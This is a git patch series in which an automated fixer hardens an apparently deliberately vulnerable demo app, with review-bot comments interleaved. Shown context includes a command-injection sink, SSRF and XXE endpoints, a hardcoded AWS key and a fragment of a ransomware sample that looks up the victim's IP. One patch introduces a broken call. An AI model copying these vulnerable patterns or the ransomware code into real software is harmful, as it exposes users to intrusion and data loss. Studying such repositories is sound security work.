From 69be8389b24de5653469128c6c402b39b4a381da Mon Sep 17 00:00:00 2001
From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com>
Date: Thu, 19 Dec 2024 20:07:52 +0000
Subject: [PATCH 1/4] Sandbox Process Creation
---
 insecure-app/app.py | 3 ++-
 insecure-app/requirements.txt | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)
diff --git a/insecure-app/app.py b/insecure-app/app.py
index 9eee52c..1f419e9 100644
--- a/insecure-app/app.py
+++ b/insecure-app/app.py
@@ -4,6 +4,7 @@
 import sqlite3
 import requests
 from lxml import etree
+from security import safe_command
 # Example hardcoded AWS credentials (sensitive data leakage)
 aws_access_key_id = 'AKIA2JAPX77RGLB664VE'
@@ -28,7 +29,7 @@ def index():
 # 2 - Command Injection
 if 'command' in request.form:
 cmd = request.form['command']
- process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ process = safe_command.run(subprocess.Popen, cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 stdout, stderr = process.communicate()
 if process.returncode == 0:
 output = stdout.decode('utf-8')
diff --git a/insecure-app/requirements.txt b/insecure-app/requirements.txt
index 57fe178..1dfa813 100644
--- a/insecure-app/requirements.txt
+++ b/insecure-app/requirements.txt
@@ -1,4 +1,5 @@
 requests == 2.19.1
 cryptography==3.3.2
 flask==3.0.2
-#cryptograpy==3.3.2
\ No newline at end of file
+#cryptograpy==3.3.2
+security==1.3.1
From 6f3b712d1288498c94508484a3cbe29c9112967d Mon Sep 17 00:00:00 2001
From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com>
Date: Thu, 19 Dec 2024 20:07:53 +0000
Subject: [PATCH 2/4] Sandbox URL Creation
---
 insecure-api/requirements.txt | 3 ++-
 insecure-app/app.py | 5 ++---
 insecure-app/ransomware.py | 4 ++--
 3 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/insecure-api/requirements.txt b/insecure-api/requirements.txt
index 40f2a2f..8ec1658 100644
--- a/insecure-api/requirements.txt
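Review bot: The replacement on the `+` line still hands the raw `request.form['command']` string to `subprocess.Popen` with `shell=True`; as far as I know `safe_command.run` vets the string against a set of restrictions before calling through, so it narrows common abuse rather than removing the injection, and any string that passes the filter is still interpreted by the shell. The durable fix is to stop treating user input as a command line: map the form value onto a fixed set of argv lists and run the selected one without a shell, as sketched below, or remove the feature. Separately, the `communicate()` call on the context line below has no `timeout`, so a slow command holds the worker indefinitely; `stdout, stderr = process.communicate(timeout=30)` with `subprocess.TimeoutExpired` handling bounds it. `index()` continues outside the hunk.
```python
# constructed example: the form value selects one of these fixed argv lists
ALLOWED_COMMANDS = {
    "uptime": ["uptime"],
    "disk-usage": ["df", "-h"],
}
# … unchanged: request handling before the 'command' branch …
if 'command' in request.form:
    argv = ALLOWED_COMMANDS.get(request.form['command'])
    if argv is None:
        output = "Unknown command"
    else:
        # no shell: argv is a fixed list, nothing from the request reaches it
        process = subprocess.Popen(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = process.communicate(timeout=30)
        # … unchanged: returncode check and output decoding …
```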
+++ b/insecure-api/requirements.txt
@@ -1,2 +1,3 @@
 fastapi==0.115.5
-uvicorn==0.32.1
\ No newline at end of file
+uvicorn==0.32.1
+security==1.3.1
diff --git a/insecure-app/app.py b/insecure-app/app.py
index 1f419e9..c1800e0 100644
--- a/insecure-app/app.py
+++ b/insecure-app/app.py
@@ -2,9 +2,8 @@
 import subprocess
 import os
 import sqlite3
-import requests
 from lxml import etree
-from security import safe_command
+from security import safe_requests, safe_command
 # Example hardcoded AWS credentials (sensitive data leakage)
 aws_access_key_id = 'AKIA2JAPX77RGLB664VE'
@@ -78,7 +77,7 @@ def index():
 elif 'url' in request.form:
 url = request.form['url']
 try:
- response = requests.get(url, timeout=60)
+ response = safe_requests.get(url, timeout=60)
 output = f"SSRF Response: {response.text[:200]}"
 except Exception as e:
 output = f"SSRF Error: {e}"
diff --git a/insecure-app/ransomware.py b/insecure-app/ransomware.py
index 9044dd4..8c7614c 100644
--- a/insecure-app/ransomware.py
+++ b/insecure-app/ransomware.py
@@ -4,7 +4,6 @@
 import webbrowser # to load webbrowser to go to specific website eg bitcoin
 import ctypes # so we can intereact with windows dlls and change windows background etc
 import urllib.request # used for downloading and saving background image
-import requests # used to make get reqeust to api.ipify.org to get target machine ip addr
 import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files
 import datetime # to give time limit on ransom note
 import subprocess # to create process for notepad and open ransom note
@@ -14,6 +13,7 @@
 from Crypto.Cipher import AES, PKCS1_OAEP
 import base64
 import threading # used for ransom note and decryption key on dekstop
+from security import safe_requests
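Review bot: `security==1.3.1` is added to `insecure-api/requirements.txt`, but no file under `insecure-api/` is touched anywhere in this series — the diffstat lists only this requirements file for that directory — so the API service gains a runtime dependency it does not import, unless code outside the series already uses it. Either drop this hunk or land it together with the API change that needs it; an unused package still has to be tracked, updated and audited like any other dependency.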
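Review bot: `safe_requests.get(url, timeout=60)` on the `+` line applies a destination policy to the user-supplied URL, but the handler around it is unchanged: the `except Exception` on the context line below reports a policy rejection with the same `SSRF Error: {e}` text as an ordinary network failure, so blocked attempts are indistinguishable in the output and nothing is logged, and the first 200 characters of any permitted response are still echoed to the caller. Catch the wrapper's rejection exception ahead of the generic handler and log it, and confirm in the library's documentation whether redirect targets are re-validated; if they are not, pass `allow_redirects=False` as well. The import hunk above removes `import requests` from app.py; if any other call site in the file still uses it, that now fails with a NameError inside whichever handler reaches it, so the rest of the file is worth checking. `index()` continues outside the hunk.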
@@ -50,7 +50,7 @@ def __init__(self):
 self.localRoot = r'D:\Coding\Python\RansomWare\RansomWare_Software\localRoot' # Debugging/Testing
 # Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
- self.publicIP = requests.get('https://api.ipify.org', timeout=60).text
+ self.publicIP = safe_requests.get('https://api.ipify.org', timeout=60).text
 # Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
From 40d9299e84a6b7c3c348d1e2ab28952513e7a9c0 Mon Sep 17 00:00:00 2001
From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com>
Date: Thu, 19 Dec 2024 20:07:54 +0000
Subject: [PATCH 3/4] Use Safe Defaults for `lxml` Parsers
---
 insecure-app/app.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/insecure-app/app.py b/insecure-app/app.py
index c1800e0..8b46da3 100644
--- a/insecure-app/app.py
+++ b/insecure-app/app.py
@@ -67,7 +67,7 @@ def index():
 xml_data = request.form['xml']
 try:
 # Use lxml to parse the XML data
- parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
+ parser = etree.XMLParser(load_dtd=True, resolve_entities=False)
 tree = etree.fromstring(xml_data.encode(), parser)
 output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}"
 except Exception as e:
From 2e95556836a496783390412608b5599e426af07d Mon Sep 17 00:00:00 2001
From: "pixeebot[bot]" <104101892+pixeebot[bot]@users.noreply.github.com>
Date: Thu, 19 Dec 2024 20:07:55 +0000
Subject: [PATCH 4/4] Use Safe Parsers in `lxml` Parsing Functions
---
 insecure-app/app.py | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/insecure-app/app.py b/insecure-app/app.py
index 8b46da3..938f431 100644
--- a/insecure-app/app.py
+++ b/insecure-app/app.py
@@ -4,6 +4,7 @@
 import sqlite3
 from lxml import etree
 from security import safe_requests, safe_command
+import lxml.etree
 # Example hardcoded AWS credentials (sensitive data leakage)
 aws_access_key_id = 'AKIA2JAPX77RGLB664VE'
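Review bot: This hunk applies the request-hardening wrapper inside `insecure-app/ransomware.py`, which by its name and its own comments is a deliberately malicious sample kept in the repository rather than application code; swapping `requests.get` for `safe_requests.get` there reduces no risk and only makes the sample depend on the `security` package. Exclude the sample path from the automated fixer's scope and revert this hunk together with the two import hunks above it (`@@ -4,7 +4,6 @@` and `@@ -14,6 +13,7 @@`). `__init__` continues outside the hunk.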
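Review bot: `resolve_entities=False` on the `+` line stops entity substitution, but the parser keeps `load_dtd=True`, so a DTD referenced by the user-supplied document is still loaded and processed; lxml's `no_network` default of True blocks fetching it over the network, but a DTD at a local path can still be loaded as far as I can tell from lxml's options. Unless DTD validation is actually needed here, `parser = etree.XMLParser(load_dtd=False, resolve_entities=False, no_network=True)` is the safer default, and the comment should say why, e.g. `# untrusted input: no DTD loading, no entity expansion, no network`. Given that this endpoint labels its own vulnerabilities in the context lines, confirm it is meant to be hardened at all rather than kept as a demonstration. `index()` continues outside the hunk.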
@@ -68,7 +69,7 @@ def index():
 try:
 # Use lxml to parse the XML data
 parser = etree.XMLParser(load_dtd=True, resolve_entities=False)
- tree = etree.fromstring(xml_data.encode(), parser)
+ tree = etree.fromstring(xml_data.encode(), parser, parser=lxml.etree.XMLParser(resolve_entities=False))
 output = f"Parsed XML: {etree.tostring(tree, encoding='unicode')}"
 except Exception as e:
 output = f"XML Parsing Error: {e}"
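Review bot: The new call passes `parser` twice — positionally and again as the keyword `parser=lxml.etree.XMLParser(resolve_entities=False)` — so `etree.fromstring` raises a TypeError for the duplicate argument on every request, the `except Exception` below reports it as `XML Parsing Error: ...`, and the XML feature silently stops working; the `parser` built on the context line above is already entity-safe after patch 3, so the second parser adds nothing. Revert the line to `tree = etree.fromstring(xml_data.encode(), parser)` and drop the redundant `import lxml.etree` added in this patch's first hunk, since `from lxml import etree` is already in scope. `index()` continues outside the hunk.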